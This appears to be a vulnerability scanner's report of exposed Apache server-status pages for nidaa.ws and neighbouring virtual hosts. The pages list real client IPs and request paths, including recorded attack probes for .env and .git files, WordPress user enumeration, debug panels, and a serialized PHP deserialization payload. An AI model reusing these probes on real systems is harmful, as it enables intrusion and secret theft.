      0.377464679830.00.021252.02
      195.191.219.132http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=936&t=5.9.71.213&c=5 HTTP/1.1
      
      0-9226310/6/9739_
      0.38746589553560.01.761847.95
      45.246.145.176http/1.13dvi.com:443GET / HTTP/1.0
      
      0-9226310/2/9461_
      0.371692772996710.00.151651.49
      45.244.17.16http/1.13dvi.com:443GET / HTTP/1.0
      
      0-9226310/2/9321_
      0.3712101123794540.00.031217.44
      45.244.16.7http/1.13dvi.com:443GET / HTTP/1.0
      
      0-9226310/1/9521_
      0.391150042250.00.001365.60
      172.70.110.9http/1.1nidaa.ws:80GET /.DS_Store HTTP/1.1
      
      0-9226310/1/9688_
      0.3901335631950.00.001631.86
      162.158.159.11http/1.1nidaa.ws:80GET /telescope/requests HTTP/1.1
      
      0-9226310/2/9881_
      0.392917105902410.00.151780.47
      197.164.123.76http/1.13dvi.com:443GET / HTTP/1.0
      
      0-9226310/2/9718_
      0.24110267923270.00.021649.89
      35.243.23.200http/1.1zed.sa:80GET /wp-content/themes/gastrobar/assets/js/modules/plugins/mode
      
      0-9226310/1/10128_
      0.24110274232580.00.001407.86
      35.243.23.200http/1.1zed.sa:80HEAD /wp-content/plugins/js_composer/assets/lib/bower/isotope/d
      
      0-9226310/1/9369_
      0.241101223554990.00.001420.82
      35.243.23.198http/1.1zed.sa:80HEAD /wp-content/plugins/woocommerce/assets/js/select2/select2.
      
      0-9226310/2/9789_
      0.26110176401900.00.021404.36
      35.243.23.200http/1.1zed.sa:80GET /wp-content/plugins/js_composer/assets/js/dist/js_composer_
      
      0-9226311/2/9591K
      0.390170215530.90.001581.06
      172.70.189.137http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      0-9226310/1/9782_
      0.261102195943360.00.011747.85
      35.243.23.200http/1.1zed.sa:80GET /wp-content/plugins/woocommerce/assets/js/jquery-blockui/jq
      
      0-9226310/1/9856_
      0.26100083982510.00.001757.15
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=887&t=136.243.37.219&c=5 HTTP
      
      1-9232340/496/9096_
      63.64110195509980.074.421789.70
      35.243.23.200http/1.1zed.sa:80HEAD /wp-content/plugins/edgtf-core/shortcodes/counter/assets/j
      
      1-9232340/525/9752_
      63.70669585091570.0106.201677.71
      89.248.172.92http/1.1trydaris.com:80GET /?_&opauth=TzozMToiR3V6emxlSHR0cFxDb29raWVcRmlsZUNvb2tpZUph
      
      1-9232340/495/9927_
      63.7435178508260.028.601654.16
      52.167.144.21http/1.1albayan.edu.sa:443GET /imgweb/222.pdf HTTP/1.1
      
      1-9232340/493/9691_
      63.641101125584970.090.001243.90
      35.243.23.198http/1.1zed.sa:80GET /wp-includes/js/jquery/ui/tabs.min.js?ver=1.13.2 HTTP/1.1
      
      1-9232340/439/9303_
      63.734010809281083990.092.771511.98
      94.98.17.253http/1.1sulaimaniya.edu.sa:443GET /download/52/%D9%81%D9%8A%D8%B2%D9%8A%D8%A7%D8%A1/1901/%D8%
      
      1-9232340/489/9852_
      63.6589073014540.092.841353.44
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=890&t=148.251.78.18&c=5 HTTP/
      
      1-9232340/423/9421_
      63.66772104013220.0114.481628.03
      45.244.69.143http/1.1albayan.edu.sa:443GET /e_sch/js/rating.js HTTP/1.1
      
      1-9<
      Found on 2024-06-08 16:06
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a8314095d551ee

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Saturday, 08-Jun-2024 19:06:30 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 10
      Parent Server MPM Generation: 9
      Server uptime:  16 days 15 hours 1 minute 40 seconds
      Server load: 0.37 0.39 0.39
      Total accesses: 2239677 - Total Traffic: 352.9 GB - Total Duration: 2812987551
      CPU Usage: u898.26 s80.02 cu9634.31 cs2184.96 - .891% CPU load
      1.56 requests/sec - 257.6 kB/second - 165.2 kB/request - 1255.98 ms/request
      16 requests currently being processed, 0 workers gracefully restarting, 184 idle workers
      _________KKC_______________________________K___________________K
      _W_________________K___K________________________________K____WWW
      WWWWWWWWWWWWWWWWWWWWWW________________K__K____________KK__R____K
      ________........................._K_______________________......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-9226310/8/10436_
      0.32625107572450.00.021601.42
      195.191.219.132http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=892&t=136.243.37.219&c=5 HTTP
      
      0-9226310/11/9230_
      0.3363369791150.00.181637.67
      45.244.69.143http/1.1albayan.edu.sa:443GET /e_sch/css/images/play.png HTTP/1.1
      
      0-9226310/3/9531_
      0.3072159668320.05.961487.15
      64.226.65.160http/1.1thenewjeddah.com:443GET / HTTP/1.1
      
      0-9226310/7/9558_
      0.31691395037700.00.011559.32
      64.226.65.160http/1.1thenewjeddah.com:443GET /s/8343e2130323e2130323e2833313/_/;/META-INF/maven/com.atla
      
      0-9226310/1/9965_
      0.1172183087220.00.011548.15
      64.226.65.160http/1.1
      
      0-9226310/1/9270_
      0.36112161345610.00.021786.70
      41.130.142.29http/1.13dvi.com:443GET / HTTP/1.0
      
      0-9226310/1/9665_
      0.31721156522780.00.001701.20
      64.226.65.160http/1.1thenewjeddah.com:443GET /v2/_catalog HTTP/1.1
      
      0-9226310/2/9470_
      0.3459199223664230.00.171713.01
      89.248.172.92http/1.1trydaris.com:443GET /?_&opauth=TzozMToiR3V6emxlSHR0cFxDb29raWVcRmlsZUNvb2tpZUph
      
      0-9226310/7/10258_
      0.342165779243760.00.331717.51
      18.236.120.101http/1.1sulaimaniya.edu.sa:443GET /2023/ HTTP/1.1
      
      0-9226311/4/9980K
      0.371176053870.80.001565.69
      172.70.114.2http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      0-9226311/14/9452K
      0.3730289641700.90.891260.96
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=940&t=89.163.242.56&c=5 HTTP/
      
      0-9226310/7/10149_
      0.370464679830.00.021252.02
      195.191.219.132http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=936&t=5.9.71.213&c=5 HTTP/1.1
      
      0-9226310/6/9739_
      0.38046589553560.01.761847.95
      45.246.145.176http/1.13dvi.com:443GET / HTTP/1.0
      
      0-9226310/2/9461_
      0.37992772996710.00.151651.49
      45.244.17.16http/1.13dvi.com:443GET / HTTP/1.0
      
      0-9226310/2/9321_
      0.375101123794540.00.031217.44
      45.244.16.7http/1.13dvi.com:443GET / HTTP/1.0
      
      0-9226310/0/9520_
      0.00127150042220.00.001365.60
      107.178.232.244http/1.1
      
      0-9226310/0/9687_
      0.001256335631920.00.001631.86
      107.178.232.244http/1.1
      
      0-9226310/1/9880_
      0.23114917105902410.00.131780.45
      35.243.23.198http/1.1zed.sa:80GET / HTTP/1.1
      
      0-9226310/2/9718_
      0.24102267923270.00.021649.89
      35.243.23.200http/1.1zed.sa:80GET /wp-content/themes/gastrobar/assets/js/modules/plugins/mode
      
      0-9226310/1/10128_
      0.24102274232580.00.001407.86
      35.243.23.200http/1.1zed.sa:80HEAD /wp-content/plugins/js_composer/assets/lib/bower/isotope/d
      
      0-9226310/1/9369_
      0.241021223554990.00.001420.82
      35.243.23.198http/1.1zed.sa:80HEAD /wp-content/plugins/woocommerce/assets/js/select2/select2.
      
      0-9226310/2/9789_
      0.26102176401900.00.021404.36
      35.243.23.200http/1.1zed.sa:80GET /wp-content/plugins/js_composer/assets/js/dist/js_composer_
      
      0-9226310/1/9590_
      0.26102270215500.00.001581.06
      35.243.23.198http/1.1zed.sa:80HEAD /wp-content/themes/gastrobar/assets/js/modules/plugins/per
      
      0-9226310/1/9782_
      0.261022195943360.00.011747.85
      35.243.23.200http/1.1zed.sa:80GET /wp-content/plugins/woocommerce/assets/js/jquery-blockui/jq
      
      0-9226310/1/9856_
      0.2693083982510.00.001757.15
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=887&t=136.243.37.219&c=5 HTTP
      
      1-9232340/496/9096_
      63.64102195509980.074.421789.70
      35.243.23.200http/1.1zed.sa:80HEAD /wp-content/plugins/edgtf-core/shortcodes/counter/assets/j
      
      1-9232340/525/9752_
      63.70599585091570.0106.201677.71
      89.248.172.92http/1.1trydaris.com:80GET /?_&opauth=TzozMToiR3V6emxlSHR0cFxDb29raWVcRmlsZUNvb2tpZUph
      
      1-9232340/495/9927_
      63.7427178508260.028.601654.16
      52.167.144.21http/1.1albayan.edu.sa:443GET /imgweb/222.pdf HTTP/1.1
      
      1-9232340/493/9691_
      63.641021125584970.090.001243.90
      35.243.23.198http/1.1zed.sa:80GET /wp-includes/js/jquery/ui/tabs.min.js?ver=1.13.2 HTTP/1.1
      
      1-9232340/439/9303_
      63.733310809281083990.092.771511.98
      94.98.17.253http/1.1sulaimaniya.edu.sa:443GET /download/52/%D9%81%D9%8A%D8%B2%D9%8A%D8%A7%D8%A1/1901/%D8%
      
      1-9232340/489/9852_
      63.6581073014540.092.841353.44
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=890&t=148.251.78.18&c=5 HTTP/
      
      1-9232340/423/9421_
      63.66692104013220.0114.481628.03
      45.244.69.143http/1.1albayan.edu.sa:443GET /e_sch/js/rating.js HTTP/1.1
      
      1-9232340/530/9549_
      63.6112
      Found on 2024-06-08 16:06
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a8314084687421

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Thursday, 06-Jun-2024 15:10:23 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 10
      Parent Server MPM Generation: 9
      Server uptime:  14 days 11 hours 5 minutes 33 seconds
      Server load: 0.47 0.81 0.95
      Total accesses: 2037094 - Total Traffic: 316.1 GB - Total Duration: 2466562200
      CPU Usage: u983.2 s108.04 cu8562.85 cs1949.77 - .929% CPU load
      1.63 requests/sec - 265.2 kB/second - 162.7 kB/request - 1210.82 ms/request
      22 requests currently being processed, 0 workers gracefully restarting, 178 idle workers
      __K_______________KW___K_____K_____________K_K____..............
      ....................................__K__K___________________WWW
      WWWWWWWWWWWWWWWWWWWWWWK________C____K______K_______K_K__________
      _________________K___________K__________________K_____K___......
      ...................K___________K_K__________....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-9126910/401/9675_
      45.99250100293120.055.191376.36
      114.119.139.123http/1.13dvi.com:80GET /images/folio/thumbs/thumbnails/443302958738058_500x500.jpg
      
      0-9126910/354/8458_
      45.8816525758491050.047.101480.90
      45.15.159.12http/1.1sulaimaniya.edu.sa:443GET /library/.env HTTP/1.1
      
      0-9126912/384/8765K
      46.013154502281.672.991253.71
      162.158.159.115http/1.1nidaa.ws:80GET /config.json HTTP/1.1
      
      0-9126910/391/8759_
      45.9865137390674890.0105.371342.53
      122.201.124.71http/1.1trydaris.com:443POST /xmlrpc.php HTTP/1.1
      
      0-9126910/316/9089_
      45.90138079865140.053.871377.92
      195.191.219.130http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=2&q=596&t=195.191.219.133&c=5 HT
      
      0-9126910/374/8438_
      45.9786267380600.051.081645.90
      51.211.16.185http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      0-9126910/429/8736_
      45.941193113604930.046.971491.46
      51.211.16.185http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/video.png HTTP/1.1
      
      0-9126910/346/8611_
      46.0081067080410.048.511568.97
      5.41.69.82http/1.1jawad.com.sa:443POST /api/v.1/front/related/product HTTP/1.1
      
      0-9126910/365/9496_
      45.96893773427880.070.821609.27
      162.55.85.221http/1.1daris.live:80GET /login HTTP/1.1
      
      0-9126910/347/8965_
      45.95109367706590.042.961429.25
      142.154.99.23http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      0-9126910/364/8779_
      45.99221264709510.052.901194.09
      167.99.182.39http/1.1customers.akg.sa:80GET /login.action HTTP/1.1
      
      0-9126910/348/9286_
      45.9926262315800.031.671151.84
      167.99.182.39http/1.1customers.akg.sa:80GET / HTTP/1.1
      
      0-9126910/324/8900_
      45.969974778172050.043.391692.12
      216.244.66.198http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%A7%D9%84%D8%AA%D9%81%D9%88%D9%82%20%D8%B3%
      
      0-9126910/335/8747_
      45.9014923267875390.017.771575.48
      45.15.159.12http/1.1sulaimaniya.edu.sa:443GET /sulaimaniya.edu.sa/.env HTTP/1.1
      
      0-9126910/461/8620_
      45.98430119201390.042.731130.25
      195.191.219.130http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=2&q=609&t=92.220.10.100&c=5 HTTP
      
      0-9126910/362/8680_
      45.8915725046502630.028.551250.55
      45.15.159.12http/1.1sulaimaniya.edu.sa:80GET /audio/.env HTTP/1.1
      
      0-9126910/411/8995_
      45.8916022055746900.038.291534.09
      45.15.159.12http/1.1sulaimaniya.edu.sa:443GET /local/.env HTTP/1.1
      
      0-9126910/456/9074_
      45.9831106103144880.0121.101665.31
      31.166.234.176http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-9126911/404/8948K
      46.014162155760.842.851504.68
      162.158.62.5http/1.1nidaa.ws:80GET /.DS_Store HTTP/1.1
      
      0-9126910/318/9169W
      45.860068767180.024.951342.70
      162.158.159.226http/1.1nidaa.ws:80GET /server-status HTTP/1.1
      
      0-9126910/320/8587_
      45.90154231221445960.027.451260.93
      45.15.159.12http/1.1sulaimaniya.edu.sa:443GET /sulaimaniya.edu.sa/.env HTTP/1.1
      
      0-9126910/469/8872_
      46.0022272530250.037.021346.07
      167.99.182.39http/1.1customers.akg.sa:80GET /?rest_route=/wp/v2/users/ HTTP/1.1
      
      0-9126910/383/8793_
      45.88163365626330.017.011401.77
      138.201.201.48http/1.1zed.sa:80POST /wp-cron.php?doing_wp_cron=1717675659.46627688407897949218
      
      0-9126911/479/8956K
      46.011161975380.835.791444.77
      172.70.114.98http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      0-9126910/365/8980_
      45.8816823763224260.092.741639.54
      45.15.159.12http/1.1sulaimaniya.edu.sa:80GET /sulaimaniya.edu.sa/.env HTTP/1.1
      
      1-9277770/427/8103_
      62.3721191347810.072.051652.34
      167.99.182.39http/1.1customers.akg.sa:80GET /.git/config HTTP/1.1
      
      1-9277770/577/8800_
      62.381032475041020.093.271552.50
      31.166.234.176http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%B9%D8%B1%D8%B6%20%D8%AA%D9%82%D8%AF%D9%8A%
      
      1-9277770/524/8928_
      62.331027675661640.059.541603.13
      172.70.158.136http/1.1qr.brunch.ws:443POST /foods/11 HTTP/1.1
      
      1-9277770/466/8811_
      62.214253106132450.020.381120.81
      66.118.128.111http/1.1
      
      1-9277771/522/8445K
      62.420173177400.841.641331.46
      172.70.114.171http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      1-9277770/752/8967_
      62.391264649270.075.021247.14
      162.158.154.105http/1.1nidaa.ws:80GET / HTTP/1.1
      
      1-9277770/510/8527_
      62.2915524295767010.021.231430.46
      45.15.159.12http/1.1sulaimaniya.edu.sa:443GET /sulaimaniya.edu.sa/.env HTTP/1.1
      
      1-9277770/527/8557_
      62.28
      Found on 2024-06-06 12:10
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a831402e9a9ff4

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Thursday, 06-Jun-2024 15:10:18 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 10
      Parent Server MPM Generation: 9
      Server uptime:  14 days 11 hours 5 minutes 28 seconds
      Server load: 0.42 0.81 0.95
      Total accesses: 2037069 - Total Traffic: 316.1 GB - Total Duration: 2466561657
      CPU Usage: u983.11 s108.02 cu8562.85 cs1949.77 - .929% CPU load
      1.63 requests/sec - 265.2 kB/second - 162.7 kB/request - 1210.84 ms/request
      12 requests currently being processed, 0 workers gracefully restarting, 188 idle workers
      __K_________________________R_K____________W______..............
      ...................................._________________________WWW
      WWWWWWWWWWWWWWWWWWWWWW_________K__C_R_______R_______K___________
      ________________________________K______________________K__......
      ..................._____________K___________....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-9126910/401/9675_
      45.99200100293120.055.191376.36
      114.119.139.123http/1.13dvi.com:80GET /images/folio/thumbs/thumbnails/443302958738058_500x500.jpg
      
      0-9126910/354/8458_
      45.8816025758491050.047.101480.90
      45.15.159.12http/1.1sulaimaniya.edu.sa:443GET /library/.env HTTP/1.1
      
      0-9126911/383/8764K
      46.010154502250.872.991253.70
      162.158.159.115http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      0-9126910/391/8759_
      45.9860137390674890.0105.371342.53
      122.201.124.71http/1.1trydaris.com:443POST /xmlrpc.php HTTP/1.1
      
      0-9126910/316/9089_
      45.90133079865140.053.871377.92
      195.191.219.130http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=2&q=596&t=195.191.219.133&c=5 HT
      
      0-9126910/374/8438_
      45.9781267380600.051.081645.90
      51.211.16.185http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      0-9126910/429/8736_
      45.941143113604930.046.971491.46
      51.211.16.185http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/video.png HTTP/1.1
      
      0-9126910/346/8611_
      46.0041067080410.048.511568.97
      5.41.69.82http/1.1jawad.com.sa:443POST /api/v.1/front/related/product HTTP/1.1
      
      0-9126910/365/9496_
      45.96843773427880.070.821609.27
      162.55.85.221http/1.1daris.live:80GET /login HTTP/1.1
      
      0-9126910/347/8965_
      45.95104367706590.042.961429.25
      142.154.99.23http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      0-9126910/364/8779_
      45.99171264709510.052.901194.09
      167.99.182.39http/1.1customers.akg.sa:80GET /login.action HTTP/1.1
      
      0-9126910/348/9286_
      45.9921262315800.031.671151.84
      167.99.182.39http/1.1customers.akg.sa:80GET / HTTP/1.1
      
      0-9126910/324/8900_
      45.969474778172050.043.391692.12
      216.244.66.198http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%A7%D9%84%D8%AA%D9%81%D9%88%D9%82%20%D8%B3%
      
      0-9126910/335/8747_
      45.9014523267875390.017.771575.48
      45.15.159.12http/1.1sulaimaniya.edu.sa:443GET /sulaimaniya.edu.sa/.env HTTP/1.1
      
      0-9126910/461/8620_
      45.98380119201390.042.731130.25
      195.191.219.130http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=2&q=609&t=92.220.10.100&c=5 HTTP
      
      0-9126910/362/8680_
      45.8915325046502630.028.551250.55
      45.15.159.12http/1.1sulaimaniya.edu.sa:80GET /audio/.env HTTP/1.1
      
      0-9126910/411/8995_
      45.8915522055746900.038.291534.09
      45.15.159.12http/1.1sulaimaniya.edu.sa:443GET /local/.env HTTP/1.1
      
      0-9126910/456/9074_
      45.9826106103144880.0121.101665.31
      31.166.234.176http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-9126910/403/8947_
      45.8616724462155730.042.851504.68
      45.15.159.12http/1.1sulaimaniya.edu.sa:443GET /src/.env HTTP/1.1
      
      0-9126910/318/9169_
      45.86164068767180.024.951342.70
      195.191.219.130http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=2&q=596&t=144.76.236.112&c=5 HTT
      
      0-9126910/320/8587_
      45.90149231221445960.027.451260.93
      45.15.159.12http/1.1sulaimaniya.edu.sa:443GET /sulaimaniya.edu.sa/.env HTTP/1.1
      
      0-9126910/469/8872_
      46.0017272530250.037.021346.07
      167.99.182.39http/1.1customers.akg.sa:80GET /?rest_route=/wp/v2/users/ HTTP/1.1
      
      0-9126910/383/8793_
      45.88158365626330.017.011401.77
      138.201.201.48http/1.1zed.sa:80POST /wp-cron.php?doing_wp_cron=1717675659.46627688407897949218
      
      0-9126910/478/8955_
      45.8716624161975350.035.791444.77
      45.15.159.12http/1.1sulaimaniya.edu.sa:80GET /sulaimaniya.edu.sa/.env HTTP/1.1
      
      0-9126910/365/8980_
      45.8816323763224260.092.741639.54
      45.15.159.12http/1.1sulaimaniya.edu.sa:80GET /sulaimaniya.edu.sa/.env HTTP/1.1
      
      1-9277770/427/8103_
      62.3716191347810.072.051652.34
      167.99.182.39http/1.1customers.akg.sa:80GET /.git/config HTTP/1.1
      
      1-9277770/577/8800_
      62.38632475041020.093.271552.50
      31.166.234.176http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%B9%D8%B1%D8%B6%20%D8%AA%D9%82%D8%AF%D9%8A%
      
      1-9277770/524/8928_
      62.33977675661640.059.541603.13
      172.70.158.136http/1.1qr.brunch.ws:443POST /foods/11 HTTP/1.1
      
      1-9277770/466/8811R
      62.21193253106132450.020.381120.81
      66.118.128.111http/1.1
      
      1-9277770/521/8444_
      62.2716725673177360.041.641331.46
      45.15.159.12http/1.1sulaimaniya.edu.sa:443GET /sulaimaniya.edu.sa/.env HTTP/1.1
      
      1-9277771/752/8967K
      62.3922646492766.675.021247.14
      162.158.154.105http/1.1nidaa.ws:80GET / HTTP/1.1
      
      1-9277770/510/8527_
      62.2915124295767010.021.231430.46
      45.15.159.12http/1.1sulaimaniya.edu.sa:443GET /sulaimaniya.edu.sa/.env HTTP/1.1
      Found on 2024-06-06 12:10
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a831407316bb76

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Tuesday, 04-Jun-2024 12:50:54 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 10
      Parent Server MPM Generation: 9
      Server uptime:  12 days 8 hours 46 minutes 4 seconds
      Server load: 0.51 0.42 0.43
      Total accesses: 1739054 - Total Traffic: 266.4 GB - Total Duration: 1990220579
      CPU Usage: u742.01 s75.04 cu7463.93 cs1706.22 - .935% CPU load
      1.63 requests/sec - 261.4 kB/second - 160.6 kB/request - 1144.43 ms/request
      9 requests currently being processed, 0 workers gracefully restarting, 241 idle workers
      ________________________K___________K____________________K______
      ________________________K_K_________________________K________WWW
      WWWWWWWWWWWWWWWWWWWWWW_____K____________________________K_______
      ____________________W_____________________________________......
      ..................._________________________....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-955050/434/8413_
      41.2050169366904640.063.781115.35
      103.15.42.200http/1.1ucc.thenewjeddah.com:443GET /build/assets/app-0707c470.js HTTP/1.1
      
      0-955050/323/7332_
      41.25359337081280.068.831190.36
      93.158.91.31http/1.1hawsab.me:443GET / HTTP/1.1
      
      0-955050/341/7545_
      41.61236137996200.017.80975.71
      172.68.225.105http/1.1adyar.com.sa:80GET /wp-content/dropdown.php HTTP/1.1
      
      0-955050/371/7646_
      41.2539814372119560.084.211120.60
